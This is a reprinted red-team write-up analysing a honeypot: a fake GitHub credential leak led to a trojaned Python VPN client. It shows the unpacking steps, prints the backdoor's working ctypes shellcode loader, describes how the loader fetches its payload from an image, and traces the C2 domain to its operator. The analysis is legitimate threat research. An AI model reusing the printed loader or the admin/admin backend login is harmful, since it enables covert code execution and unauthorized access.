Unmasking a Fake GitHub Leak: From Weak Passwords to a Red Team Backdoor

During an information‑gathering phase of a red‑team exercise, a seemingly innocuous GitHub repository was found to contain leaked credentials, which turned out to be a trap for the red‑team.

Below is an interesting analysis and tracing process.

0x01 Information Gathering

GitHub Information Leakage

Standard GitHub sensitive‑information scanning based on the target’s data revealed a repository that was not ordinary.

The repository appeared to contain MySQL usernames and passwords, prompting an attempt to open it with Navicat.

After failing, the source’s port 8080 was accessed, revealing a management backend.

Weak Passwords

Trying common credentials on the backend yielded admin/admin, granting access.

Inside the admin panel, usernames, passwords, and even the client‑extraction password were plainly displayed.

Assuming the VPN client could be obtained, the downloaded file was examined.

0x02 Analysis and Tracing

Running the VPN client in a virtual machine showed an incompatibility message, hinting at a Python‑based implementation.

The login request used a query string like admin.php?user=admin&passwd=admin.

Unpacking

python3 pyinstxtractor.py vpnclient64.exe

This command creates a folder named vpnclient64.exe_extracted containing the unpacked files.

Because PyInstaller strips the first eight bytes of .pyc files, the original header must be restored manually.

Adding Header

Using the struct.py file, the missing header bytes are re‑added.

Source Code

The extracted easyvpn64.py is the backdoor’s main program; it loads shellcode hidden inside an image.

Requests are used to fetch the image from OSS, which contains the shellcode loader.

Shellcode Loader

import base64
import ctypes

str = b''
sc_base64 = (base64.a85decode(str)).decode('utf-8')
shellcode = bytearray(bytearray.fromhex((base64.b64decode(sc_base64)).decode('utf-8')))

ptr = ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))

handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

The loader extracts the C2 address, which resolves to cs.xxx.cn.

Tracing

DNS lookup of the C2 domain yields an IP address that maps to a specific dormitory.

Further investigation links the activity to a Telegram account.

0x03 Summary

During penetration testing, be vigilant against phishing traps; the attacker had already documented the operation.

Reprinted from XianZhi Community – original URL: https://xz.aliyun.com/t/11275 – author: kat